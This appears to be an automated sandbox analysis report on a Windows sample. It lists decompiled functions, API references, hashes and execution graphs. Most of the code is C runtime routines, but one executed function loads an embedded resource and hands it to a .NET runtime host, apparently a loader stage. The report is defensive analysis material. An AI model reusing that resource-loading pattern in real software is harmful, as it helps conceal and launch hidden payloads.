				_v8 = _t15;
				_a4 = _t33;
				if(_t22 != 0) {
					do {
						_t35 = _t22 + 4;
						_t29 = lstrlenW(_t35);
						_t36 = _a4;
						lstrcpynW(_t36, _t35, _t29);
						_t33 =  &(_t36[_t29]);
						_a4 = _t33;
						if( *_t22 != 0) {
							 *_t33 = 0x3b;
							_t33 =  &(_t33[1]);
							_a4 = _t33;
						}
						_t22 =  *_t22;
					} while (_t22 != 0);
					_t15 = _v8;
				}
				 *_t33 = 0;
				return _t15;
			}













                        0x010615a5
                        0x010615aa
                        0x010615af
                        0x010615b3
                        0x010615b5
                        0x010615b9
                        0x010615bf
                        0x010615c2
                        0x010615c4
                        0x010615b5
                        0x010615d5
                        0x010615db
                        0x010615dd
                        0x010615e0
                        0x010615e5
                        0x010615f0
                        0x010615f0
                        0x010615fa
                        0x010615fe
                        0x01061602
                        0x0106160b
                        0x0106160e
                        0x01061611
                        0x01061618
                        0x0106161b
                        0x0106161e
                        0x0106161e
                        0x01061621
                        0x01061623
                        0x01061627
                        0x01061627
                        0x0106162d
                        0x01061635

                        APIs
                        • lstrlenW.KERNEL32(?), ref: 010615B9
                        • GetProcessHeap.KERNEL32(00000000), ref: 010615CE
                        • HeapAlloc.KERNEL32(00000000), ref: 010615D5
                        • lstrlenW.KERNEL32(?), ref: 010615F4
                        • lstrcpynW.KERNEL32(?,?,00000000), ref: 01061602
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heaplstrlen$AllocProcesslstrcpyn
                        • String ID:
                        • API String ID: 3934205894-0
                        • Opcode ID: 86d28e5803d29a6b8cc05dcf7667daa43789470126c2053192b2e8e69938652d
                        • Instruction ID: 046c8494578fe25ddda53785ce6509faeddc8c0a349deb4468921b35c8b603d3
                        • Opcode Fuzzy Hash: 86d28e5803d29a6b8cc05dcf7667daa43789470126c2053192b2e8e69938652d
                        • Instruction Fuzzy Hash: 0B11A376900325EFDB218F98C484A9ABBECEF48350F19406AFE85D7204D775AD418BE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01071597 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E01071597(void* __edx, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				void* __ebx;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t60;
				char* _t63;

				_t63 = _a8;
				if(_t63 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t63 != 0) {
					E01065839(_t50,  &_v20, __edx, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E010703F5( *_t63 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t60 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t63, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t60;
							}
							L20:
							_t44 = E010647CC(__eflags);
							_t60 = _t60 | 0xffffffff;
							__eflags = _t60;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t60 = _v20;
						__eflags =  *(_t60 + 0x74) - 1;
						if( *(_t60 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t60 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t63[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t60 =  *(_t60 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t60 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t60 + 4), 9, _t63,  *(_t60 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t60 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t63 & 0x000000ff;
					}
					_t60 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

















                        0x0107159f
                        0x010715a4
                        0x010715be
                        0x00000000
                        0x010715be
                        0x010715a6
                        0x010715ab
                        0x00000000
                        0x00000000
                        0x010715b0
                        0x010715cb
                        0x010715d0
                        0x010715d3
                        0x010715da
                        0x010715f9
                        0x01071600
                        0x01071602
                        0x01071646
                        0x0107164e
                        0x01071663
                        0x01071665
                        0x01071675
                        0x01071675
                        0x01071679
                        0x0107167b
                        0x0107167e
                        0x0107167e
                        0x0107167e
                        0x0107167e
                        0x00000000
                        0x01071684
                        0x01071667
                        0x01071667
                        0x0107166c
                        0x0107166c
                        0x0107166f
                        0x00000000
                        0x0107166f
                        0x01071604
                        0x01071607
                        0x0107160b
                        0x01071634
                        0x01071634
                        0x01071637
                        0x01071637
                        0x00000000
                        0x00000000
                        0x01071639
                        0x0107163d
                        0x00000000
                        0x00000000
                        0x0107163f
                        0x0107163f
                        0x00000000
                        0x0107163f
                        0x0107160d
                        0x01071610
                        0x00000000
                        0x00000000
                        0x01071614
                        0x01071627
                        0x0107162d
                        0x01071630
                        0x01071632
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01071632
                        0x010715dc
                        0x010715df
                        0x010715e1
                        0x010715e6
                        0x010715e6
                        0x010715eb
                        0x00000000
                        0x010715eb
                        0x010715b2
                        0x010715b7
                        0x010715bb
                        0x010715bb
                        0x00000000

                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 010715CB
                        • __isleadbyte_l.LIBCMT ref: 010715F9
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 01071627
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0107165D
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: 5535c6c9c1236ba3afa5c93c3669862bb266e21c5b1217fb2cad64e5ce3a2d97
                        • Instruction ID: 0d806addd46576e8d9c343e52224aa2292d5002b4fb6148188df7f120cb8224e
                        • Opcode Fuzzy Hash: 5535c6c9c1236ba3afa5c93c3669862bb266e21c5b1217fb2cad64e5ce3a2d97
                        • Instruction Fuzzy Hash: 0B31CF31E00246EFEB268F69C844BAA7FFAFF45210F1941A9F5A1971D0E731D850CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:6.7%
                        Dynamic/Decrypted Code Coverage:13.4%
                        Signature Coverage:10.9%
                        Total number of Nodes:119
                        Total number of Limit Nodes:7
                        execution_graph 27573 404a83 27586 407507 GetEnvironmentStringsW 27573->27586 27575 404a94 27576 404aa6 27575->27576 27577 404a9a 27575->27577 27594 404ad7 41 API calls 2 library calls 27576->27594 27593 40650b 14 API calls 2 library calls 27577->27593 27580 404aa0 27581 404aad 27595 40650b 14 API calls 2 library calls 27581->27595 27583 404aca 27596 40650b 14 API calls 2 library calls 27583->27596 27585 404ad0 27587 407516 27586->27587 27588 407518 27586->27588 27587->27575 27597 407d48 27588->27597 27590 40752d __InternalCxxFrameHandler 27604 40650b 14 API calls 2 library calls 27590->27604 27592 407547 FreeEnvironmentStringsW 27592->27575 27593->27580 27594->27581 27595->27583 27596->27585 27598 407d86 27597->27598 27602 407d56 _com_raise_error 27597->27602 27606 40649b 14 API calls __FrameHandler3::FrameUnwindToState 27598->27606 27599 407d71 RtlAllocateHeap 27601 407d84 27599->27601 27599->27602 27601->27590 27602->27598 27602->27599 27605 4087b5 EnterCriticalSection LeaveCriticalSection _com_raise_error 27602->27605 27604->27592 27605->27602 27606->27601 27607 1055e9d 27608 1055e77 27607->27608 27609 1055efd LdrInitializeThunk 27608->27609 27610 1055f2a 27609->27610 27611 401708 27616 401e16 SetUnhandledExceptionFilter 27611->27616 27613 40170d _com_raise_error 27617 4051cb 41 API calls _com_raise_error 27613->27617 27615 401718 27616->27613 27617->27615 27618 40171a 27619 401726 __FrameHandler3::FrameUnwindToState 27618->27619 27644 401992 27619->27644 27621 40172d 27622 401880 27621->27622 27631 401757 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 27621->27631 27666 401c83 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _com_raise_error 27622->27666 27624 401887 27667 40506f 21 API calls __FrameHandler3::FrameUnwindToState 27624->27667 27626 40188d 27668 405033 21 API calls __FrameHandler3::FrameUnwindToState 27626->27668 27628 401895 27629 401776 27631->27629 27634 4017f7 27631->27634 27665 405049 41 API calls 2 library calls 27631->27665 27632 4017fd 27659 40147b GetModuleHandleW FindResourceW 27632->27659 27655 401d9e 27634->27655 27645 40199b 27644->27645 27669 40207b IsProcessorFeaturePresent 27645->27669 27647 4019a7 27670 4025ca 10 API calls 2 library calls 27647->27670 27649 4019ac 27650 4019b0 27649->27650 27671 40563d 27649->27671 27650->27621 27653 4019c7 27653->27621 27730 402470 27655->27730 27657 401db1 GetStartupInfoW 27658 401dc4 27657->27658 27658->27632 27660 40149d GetModuleHandleW LoadResource 27659->27660 27661 4014de ExitProcess 27659->27661 27662 4014d7 FreeResource 27660->27662 27663 4014af LockResource GetModuleHandleW SizeofResource 27660->27663 27662->27661 27663->27662 27664 4014cc 27663->27664 27664->27662 27665->27634 27666->27624 27667->27626 27668->27628 27669->27647 27670->27649 27675 40870d 27671->27675 27674 4025e9 7 API calls 2 library calls 27674->27650 27676 4019b9 27675->27676 27677 40871d 27675->27677 27676->27653 27676->27674 27677->27676 27679 407a4c 27677->27679 27680 407a58 __FrameHandler3::FrameUnwindToState 27679->27680 27691 407596 EnterCriticalSection 27680->27691 27682 407a5f 27692 4076f1 27682->27692 27685 407a7d 27707 407aa3 LeaveCriticalSection __FrameHandler3::FrameUnwindToState 27685->27707 27688 407a78 27706 40799c GetStdHandle GetFileType 27688->27706 27689 407a8e 27689->27677 27691->27682 27693 4076fd __FrameHandler3::FrameUnwindToState 27692->27693 27694 407706 27693->27694 27695 407727 27693->27695 27716 40649b 14 API calls __FrameHandler3::FrameUnwindToState 27694->27716 27708 407596 EnterCriticalSection 27695->27708 27698 40770b 27717 4062a0 41 API calls _com_raise_error 27698->27717 27700 407715 27700->27685 27705 4078e6 44 API calls 27700->27705 27701 40775f 27718 407786 LeaveCriticalSection __FrameHandler3::FrameUnwindToState 27701->27718 27704 407733 27704->27701 27709 407641 27704->27709 27705->27688 27706->27685 27707->27689 27708->27704 27719 4064ae 27709->27719 27711 407653 27715 407660 27711->27715 27726 408562 6 API calls _com_raise_error 27711->27726 27713 4076b5 27713->27704 27727 40650b 14 API calls 2 library calls 27715->27727 27716->27698 27717->27700 27718->27700 27724 4064bb _com_raise_error 27719->27724 27720 4064fb 27729 40649b 14 API calls __FrameHandler3::FrameUnwindToState 27720->27729 27721 4064e6 RtlAllocateHeap 27723 4064f9 27721->27723 27721->27724 27723->27711 27724->27720 27724->27721 27728 4087b5 EnterCriticalSection LeaveCriticalSection _com_raise_error 27724->27728 27726->27711 27727->27713 27728->27724 27729->27723 27730->27657 27731 1053e18 27732 1053e2a 27731->27732 27733 1053ead KiUserExceptionDispatcher 27732->27733 27738 1056a59 27733->27738 27734 1053ebb 27742 1058b99 27734->27742 27735 1053ede 27739 1056a8a KiUserExceptionDispatcher 27738->27739 27741 1056b46 27739->27741 27741->27734 27745 1058bca 27742->27745 27743 1058faf 27743->27735 27744 1058d19 KiUserExceptionDispatcher 27744->27745 27745->27743 27745->27744

                        Executed Functions

                        Function 0040147B Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 100%
                        			E0040147B() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








                        0x00401491
                        0x00401497
                        0x0040149b
                        0x004014de
                        0x004014e0
                        0x004014e0
                        0x004014a9
                        0x004014ad
                        0x004014b9
                        0x004014bf
                        0x004014c5
                        0x004014ca
                        0x004014d2
                        0x004014d2
                        0x004014ca
                        0x004014d8
                        0x00000000

                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040148E
                        • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 00401491
                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014A0
                        • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014A3
                        • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014B0
                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014BC
                        • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014BF
                          • Part of subcall function 0040147B: CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037
                        • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014D8
                        • ExitProcess.KERNEL32 ref: 004014E0
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                        • String ID: v4.0.30319
                        • API String ID: 2372384083-3152434051
                        • Opcode ID: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
                        • Instruction ID: 1025187115c16df301aa5e6fb14f5cc9936e15f8599d421e9e42fb84dc5f9529
                        • Opcode Fuzzy Hash: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
                        • Instruction Fuzzy Hash: D4F04470A0131477EB202BF34D4DF2B755C9F85746F040874F601BA2A0CAB4DC008679
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01055DB7 Relevance: 2.2, APIs: 1, Instructions: 685libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 571 1055db7-1055de8 572 1055def-1055e75 571->572 573 1055dea 571->573 575 1055edb-1055ef1 572->575 573->572 576 1055e77-1055e80 575->576 577 1055ef3-1055f23 LdrInitializeThunk 575->577 578 1055e87-1055ed1 576->578 579 1055e82 576->579 583 1055f2a-1055fee 577->583 584 1055ed3 578->584 585 1055ed8 578->585 579->578 592 1055ff4-1056014 583->592 593 1056909-105693f 583->593 584->585 585->575 596 10568e6-1056902 592->596 597 1056019-1056022 596->597 598 1056908 596->598 599 1056024 597->599 600 1056029-105608f 597->600 598->593 599->600 604 1056096-1056123 600->604 605 1056091 600->605 611 1056135-105613c 604->611 612 1056125-105612c 604->612 605->604 615 1056143-1056150 611->615 616 105613e 611->616 613 1056133 612->613 614 105612e 612->614 613->615 614->613 617 1056157-105615e 615->617 618 1056152 615->618 616->615 619 1056165-10561bc 617->619 620 1056160 617->620 618->617 623 10561c3-10561da 619->623 624 10561be 619->624 620->619 625 10561e5-10561ed 623->625 626 10561dc-10561e3 623->626 624->623 627 10561ee-10561f8 625->627 626->627 628 10561ff-1056208 627->628 629 10561fa 627->629 630 10568b6-10568bc 628->630 629->628 631 10568c2-10568dc 630->631 632 105620d-1056219 630->632 640 10568e3 631->640 641 10568de 631->641 633 1056220-1056225 632->633 634 105621b 632->634 635 1056227-1056233 633->635 636 1056268-105626a 633->636 634->633 638 1056235 635->638 639 105623a-105623f 635->639 642 1056270-1056284 636->642 638->639 639->636 643 1056241-105624e 639->643 640->596 641->640 644 1056894-10568a1 642->644 645 105628a-105629f 642->645 649 1056255-1056266 643->649 650 1056250 643->650 648 10568a2-10568ac 644->648 646 10562a6-1056323 645->646 647 10562a1 645->647 657 1056325-105634b 646->657 658 105634d 646->658 647->646 651 10568b3 648->651 652 10568ae 648->652 649->642 650->649 651->630 652->651 659 1056357-105636b 657->659 658->659 660 10564c6-10564cb 659->660 661 1056371-105637b 659->661 665 10564cd-10564ed 660->665 666 105652f-1056531 660->666 663 1056382-10563a8 661->663 664 105637d 661->664 667 10563bf-10563c1 663->667 668 10563aa-10563b4 663->668 664->663 676 1056517 665->676 677 10564ef-1056515 665->677 669 1056537-1056557 666->669 673 105644b-1056457 667->673 671 10563b6 668->671 672 10563bb-10563be 668->672 674 105655d-1056567 669->674 675 105688e-105688f 669->675 671->672 672->667 678 105645e-1056463 673->678 679 1056459 673->679 680 105656e-1056597 674->680 681 1056569 674->681 682 1056890-1056892 675->682 685 1056521-105652d 676->685 677->685 686 1056465-1056472 678->686 687 105648a-105648c 678->687 679->678 683 10565b1-10565bf 680->683 684 1056599-10565a3 680->684 681->680 682->648 690 1056658-1056667 683->690 688 10565a5 684->688 689 10565aa-10565b0 684->689 685->669 692 1056474 686->692 693 1056479-1056488 686->693 694 1056492-10564a6 687->694 688->689 689->683 697 105666e-1056673 690->697 698 1056669 690->698 692->693 693->694 695 10563c6-10563db 694->695 696 10564ac-10564c1 694->696 701 10563e2-1056440 695->701 702 10563dd 695->702 696->682 699 1056675-1056685 697->699 700 105669d-105669f 697->700 698->697 703 1056687 699->703 704 105668c-105669b 699->704 705 10566a5-10566b9 700->705 720 1056447-105644a 701->720 721 1056442 701->721 702->701 703->704 704->705 706 10565c4-10565df 705->706 707 10566bf-105672b call 1054820 * 2 705->707 709 10565e6-105664a 706->709 710 10565e1 706->710 718 1056734-105688a 707->718 719 105672d-105672f 707->719 726 1056651-1056657 709->726 727 105664c 709->727 710->709 723 105688b-105688c 718->723 719->723 720->673 721->720 723->631 726->690 727->726
                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: ee0fe6bd0be598dfd4071266fcc3a76ffc49ad7927e725038007435c78b95f8b
                        • Instruction ID: 0cb9ef9fe9c0cfe745727139573ad959f5010b979b2a458d86e8a0fd83e31d69
                        • Opcode Fuzzy Hash: ee0fe6bd0be598dfd4071266fcc3a76ffc49ad7927e725038007435c78b95f8b
                        • Instruction Fuzzy Hash: D262C174E002298FDB64DF69C890BEEFBB2BB49304F5481E9D849A7255DB319E81CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01056A59 Relevance: 1.8, APIs: 1, Instructions: 273COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 740 1056a59-1056a88 741 1056a8f-1056b54 KiUserExceptionDispatcher 740->741 742 1056a8a 740->742 748 1056e72-1056ea4 741->748 749 1056b5a-1056b72 741->749 742->741 752 1056b74 749->752 753 1056b79-1056b82 749->753 752->753 754 1056e65-1056e6b 753->754 755 1056b87-1056c01 754->755 756 1056e71 754->756 761 1056c07-1056c75 755->761 762 1056cbd-1056d18 755->762 756->748 771 1056c77-1056cb7 761->771 772 1056cb8-1056cbb 761->772 773 1056d19-1056d67 call 1054820 * 2 762->773 771->772 772->773 780 1056e50-1056e5b 773->780 781 1056d6d-1056e4f 773->781 783 1056e62 780->783 784 1056e5d 780->784 781->780 783->754 784->783
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 01056B34
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: aa6ecc2c0dab287099aebd012d17b9250bab465c3b05f873e1f6059e561dee2f
                        • Instruction ID: 57936f5b05adce1cfd7385b7fcfee57efa5e2af23cef6659778b19daab217b30
                        • Opcode Fuzzy Hash: aa6ecc2c0dab287099aebd012d17b9250bab465c3b05f873e1f6059e561dee2f
                        • Instruction Fuzzy Hash: 3BD1A178E00218CFDB54DFA9D854BADBBB2BF89304F2080A9D809AB355DB355E85DF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01058B99 Relevance: 1.8, APIs: 1, Instructions: 271COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 796 1058b99-1058bc8 797 1058bcf-1058c92 call 1056ec8 call 1057358 796->797 798 1058bca 796->798 807 1058fb0-1058fe2 797->807 808 1058c98-1058cb0 797->808 798->797 811 1058cb7-1058cc0 808->811 812 1058cb2 808->812 813 1058fa3-1058fa9 811->813 812->811 814 1058cc5-1058d3f KiUserExceptionDispatcher 813->814 815 1058faf 813->815 819 1058d45-1058db3 814->819 820 1058dfb-1058e56 814->820 815->807 829 1058db5-1058df5 819->829 830 1058df6-1058df9 819->830 831 1058e57-1058ea5 call 1054820 * 2 820->831 829->830 830->831 838 1058f8e-1058f99 831->838 839 1058eab-1058f8d 831->839 840 1058fa0 838->840 841 1058f9b 838->841 839->838 840->813 841->840
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 01058D2B
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 3f6811cc011cc3708efcd76f18f905b0a2cf651c39b5f85309aafcfc9dcef705
                        • Instruction ID: ffe3e9386468966114b097b5fb57f68f492fd4359216ff038c324257fce4ef9e
                        • Opcode Fuzzy Hash: 3f6811cc011cc3708efcd76f18f905b0a2cf651c39b5f85309aafcfc9dcef705
                        • Instruction Fuzzy Hash: 1FD1A074E00218CFDB54DFA9D894BADBBB2BF89304F2080AAD809A7355DB355E85DF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401E16 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1381 401e16-401e21 SetUnhandledExceptionFilter
                        C-Code - Quality: 100%
                        			E00401E16() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E22); // executed
				return _t1;
			}




                        0x00401e1b
                        0x00401e21

                        APIs
                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E22,0040170D), ref: 00401E1B
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
                        • Instruction ID: 1700cd800284021a96fa1165edcf07aa52b884b6f150888f85792e917e9d8571
                        • Opcode Fuzzy Hash: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0105F321 Relevance: .5, Instructions: 471COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1424 105f321-105f340 1425 105f347-105f353 1424->1425 1426 105f342 1424->1426 1429 105f355 1425->1429 1430 105f35a-105f36f 1425->1430 1427 105f473-105f47d 1426->1427 1429->1427 1433 105f375-105f380 1430->1433 1434 105f483-105f4c3 call 1054690 1430->1434 1437 105f386-105f38d 1433->1437 1438 105f47e 1433->1438 1451 105f4ca-105f555 call 1054690 call 1054588 1434->1451 1439 105f38f-105f3a6 1437->1439 1440 105f3ba-105f3c5 1437->1440 1438->1434 1450 105f3ac-105f3af 1439->1450 1439->1451 1445 105f3c7-105f3cf 1440->1445 1446 105f3d2-105f3dc 1440->1446 1445->1446 1454 105f466-105f46b 1446->1454 1455 105f3e2-105f3ec 1446->1455 1450->1438 1456 105f3b5-105f3b8 1450->1456 1484 105f557-105f55b 1451->1484 1485 105f55d-105f563 1451->1485 1454->1427 1455->1438 1462 105f3f2-105f40e 1455->1462 1456->1439 1456->1440 1467 105f410 1462->1467 1468 105f412-105f415 1462->1468 1467->1427 1470 105f417-105f41a 1468->1470 1471 105f41c-105f41f 1468->1471 1473 105f422-105f430 1470->1473 1471->1473 1473->1438 1477 105f432-105f439 1473->1477 1477->1427 1479 105f43b-105f441 1477->1479 1479->1438 1480 105f443-105f448 1479->1480 1480->1438 1482 105f44a-105f45d 1480->1482 1482->1438 1489 105f45f-105f462 1482->1489 1484->1485 1487 105f565-105f569 1484->1487 1488 105f58a-105f58b 1485->1488 1490 105f58c-105f5c8 1487->1490 1491 105f56b-105f572 1487->1491 1489->1479 1492 105f464 1489->1492 1499 105f5cf-105f673 call 1056ec8 call 1057358 1490->1499 1500 105f5ca 1490->1500 1493 105f574-105f579 1491->1493 1494 105f57b-105f586 1491->1494 1492->1427 1493->1494 1495 105f588 1493->1495 1494->1488 1495->1488 1507 105f678-105f692 1499->1507 1500->1499 1509 105f698-105f6af 1507->1509 1510 105f9aa-105f9dc 1507->1510 1513 105f6b6-105f6bf 1509->1513 1514 105f6b1 1509->1514 1515 105f99d-105f9a3 1513->1515 1514->1513 1516 105f6c4-105f73a 1515->1516 1517 105f9a9 1515->1517 1522 105f7f6-105f850 1516->1522 1523 105f740-105f7ae 1516->1523 1517->1510 1534 105f851-105f89f call 1054820 * 2 1522->1534 1532 105f7f1-105f7f4 1523->1532 1533 105f7b0-105f7f0 1523->1533 1532->1534 1533->1532 1541 105f8a5-105f987 1534->1541 1542 105f988-105f993 1534->1542 1541->1542 1543 105f995 1542->1543 1544 105f99a 1542->1544 1543->1544 1544->1515
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1bb2e0e171d20e8b5b2cbcb9f154a5963e789709b11f1b01320dc3a12fae1425
                        • Instruction ID: 30ed87cb63f1625f539a0d0ad8842c4ab152adfefde0a39d4dea11e25917224b
                        • Opcode Fuzzy Hash: 1bb2e0e171d20e8b5b2cbcb9f154a5963e789709b11f1b01320dc3a12fae1425
                        • Instruction Fuzzy Hash: 13125774E002198FDB54DFA8C9507AEBBF2BF89304F2084A9D849AB395DB359D42CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01057358 Relevance: .4, Instructions: 357COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
